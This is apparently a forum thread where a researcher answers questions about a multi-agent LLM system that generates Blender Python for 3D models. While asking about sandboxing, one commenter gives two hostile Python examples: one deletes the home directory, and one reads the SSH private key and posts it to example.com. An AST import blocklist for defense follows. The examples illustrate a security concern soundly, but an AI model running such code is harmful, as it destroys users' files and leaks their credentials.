ranahanocka 4 days ago

Author here. AMA!

panzi 2 days ago

Do you execute the Python code directly in Blender or do you perform some sort of sandboxing? How do you make sure that the code only contains safe instructions and doesn't do something like this?

    import os, shutil
    shutil.rmtree(os.getenv("HOME"))
Or this?

    import os
    from urllib import request
    data = open(os.getenv("HOME")+"/.ssh/id_rsa").read()
    req = request.Request("http://example.com/", data=data.encode())
    request.urlopen(req)
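
For illustration only: a common first line of defense is to statically scan the generated code for disallowed imports before handing it to Blender. The blocklist below is hypothetical and easy to bypass, so a static scan is no substitute for OS-level sandboxing (e.g. a container), but it sketches the idea:

    import ast

    # Hypothetical blocklist -- illustrative only, and trivially incomplete.
    BLOCKED = {"os", "shutil", "subprocess", "socket", "urllib"}

    def blocked_imports(source: str) -> list[str]:
        """Return any blocked top-level modules imported by generated code."""
        hits = []
        for node in ast.walk(ast.parse(source)):
            if isinstance(node, ast.Import):
                hits += [a.name for a in node.names
                         if a.name.split(".")[0] in BLOCKED]
            elif isinstance(node, ast.ImportFrom) and node.module:
                if node.module.split(".")[0] in BLOCKED:
                    hits.append(node.module)
        return hits

    code = 'import os, shutil\nshutil.rmtree(os.getenv("HOME"))'
    print(blocked_imports(code))  # ['os', 'shutil'] -> refuse to execute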
GistNoesis 4 days ago

How would you go about making the LLM generate objects that are easier to 3D print (or manufacture)? Things like not using too much material, reducing the need for supports, and maybe whether or not the produced part would be tough enough.

Are there datasets where an LLM learns to interact with slicers, Finite Element Analysis software, or even real-world 3D-printed objects, to allow the model to do some quality assessment?

ranahanocka 4 days ago

Interesting idea. Our framework of having multiple agents with different roles could play well with this. You could create an agent that checks for certain criteria and gives feedback to the coding agent. For example, you could build an agent that evaluates the toughness of the current 3D asset and suggests fixes. I like the idea of incorporating additional experts to solve different tasks!
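
Not from the paper, but as a rough sketch of what such a critic agent could check, assuming the asset is exported and loaded with trimesh (the heuristics, thresholds, and messages are invented):

    import trimesh

    def critique_asset(path):
        """Hypothetical printability critic; returns feedback for the coder agent."""
        mesh = trimesh.load(path, force="mesh")
        feedback = []
        if not mesh.is_watertight:
            feedback.append("Mesh is not watertight; slicers may fail. Close the holes.")
        elif mesh.volume > 0.5 * mesh.bounding_box.volume:
            feedback.append("Part is mostly solid; hollow it out to save material.")
        return feedback or ["No obvious printability issues found."]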

dvdplm 4 days ago

I like the idea of LLMs collaborating like this a lot: planning, critiquing, verifying, coding, etc. I think that's a very general and powerful approach. How did you end up with that structure, and what did you try first? What are the downsides? How do the component agents communicate, just JSON?

ranahanocka 4 days ago

The agents communicate through different paths. First, there's a "big boss" orchestrator that decides who speaks next. The outputs from all agents (including the code from the coding agent) are put into a shared context that each agent can draw from. Practically speaking, we use the AutoGen framework to make this happen.
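
That pattern maps onto AutoGen's group-chat primitives roughly as in the sketch below (the agent names, role prompts, and model config are invented for illustration, not the paper's actual setup):

    import autogen

    llm_config = {"config_list": [{"model": "gpt-4", "api_key": "..."}]}

    # Each specialist is an AssistantAgent with its own role prompt.
    planner = autogen.AssistantAgent(
        "planner", llm_config=llm_config,
        system_message="Break the 3D asset request into modeling steps.")
    coder = autogen.AssistantAgent(
        "coder", llm_config=llm_config,
        system_message="Write Blender Python (bpy) code for the current step.")
    critic = autogen.AssistantAgent(
        "critic", llm_config=llm_config,
        system_message="Review the result and suggest concrete fixes.")

    # Shared context: every message lands in one transcript all agents see.
    chat = autogen.GroupChat(agents=[planner, coder, critic],
                             messages=[], max_round=12)

    # The "big boss": an LLM-backed manager that decides who speaks next.
    manager = autogen.GroupChatManager(groupchat=chat, llm_config=llm_config)

    planner.initiate_chat(manager, message="Model a wooden chair.")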

We slowly started building more and more agents. Everything we tried just worked (kinda amazing). We first started by trying to incorporate visual understanding via VLMs, then kept adding agents, and BlenderRAG gave a huge boost.
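
A BlenderRAG-style retrieval step could be as simple as the sketch below; this TF-IDF version is a stand-in assumption for illustration, and the actual retriever over the Blender API docs may well differ:

    from sklearn.feature_extraction.text import TfidfVectorizer
    from sklearn.metrics.pairwise import cosine_similarity

    # Stand-in corpus: snippets from the Blender Python (bpy) API docs.
    docs = [
        "bpy.ops.mesh.primitive_cube_add(size=2.0) adds a cube",
        "bpy.ops.object.modifier_add(type='SUBSURF') adds subdivision",
        "obj.modifiers.new(name='Bevel', type='BEVEL') bevels edges",
    ]

    vectorizer = TfidfVectorizer().fit(docs)
    doc_matrix = vectorizer.transform(docs)

    def retrieve(query, k=2):
        """Return the k snippets most similar to the coder's query."""
        sims = cosine_similarity(vectorizer.transform([query]), doc_matrix)[0]
        return [docs[i] for i in sims.argsort()[::-1][:k]]

    # The hits get prepended to the coding agent's prompt.
    print(retrieve("add a cube to the scene"))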

rapjr9 4 days ago

Could this produce a 3D model of a plastic case that will perfectly fit a PCB? Could it be improved to also produce the CAD files for the PCB itself?
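
For reference, the kind of bpy code the system would need to emit for a simple open-top case is quite tractable; a parametric sketch with invented dimensions and clearances:

    import bpy

    # Hypothetical PCB dimensions (mm), wall thickness, and fit clearance.
    pcb_w, pcb_d, pcb_h = 60.0, 40.0, 1.6
    wall, clearance = 2.0, 0.5

    def add_box(w, d, h, z):
        """Add a box of the given dimensions centered at height z."""
        bpy.ops.mesh.primitive_cube_add(size=2.0, location=(0, 0, z))
        obj = bpy.context.active_object
        obj.scale = (w / 2, d / 2, h / 2)
        return obj

    outer = add_box(pcb_w + 2 * (wall + clearance),
                    pcb_d + 2 * (wall + clearance),
                    pcb_h + wall + 5.0, 0)
    cavity = add_box(pcb_w + 2 * clearance,
                     pcb_d + 2 * clearance,
                     pcb_h + 5.0, wall / 2)  # shifted up: solid floor, open top

    # Hollow the case with a boolean difference, then discard the cutter.
    mod = outer.modifiers.new(name="cavity", type='BOOLEAN')
    mod.object = cavity
    mod.operation = 'DIFFERENCE'
    bpy.context.view_layer.objects.active = outer
    bpy.ops.object.modifier_apply(modifier="cavity")
    bpy.data.objects.remove(cavity)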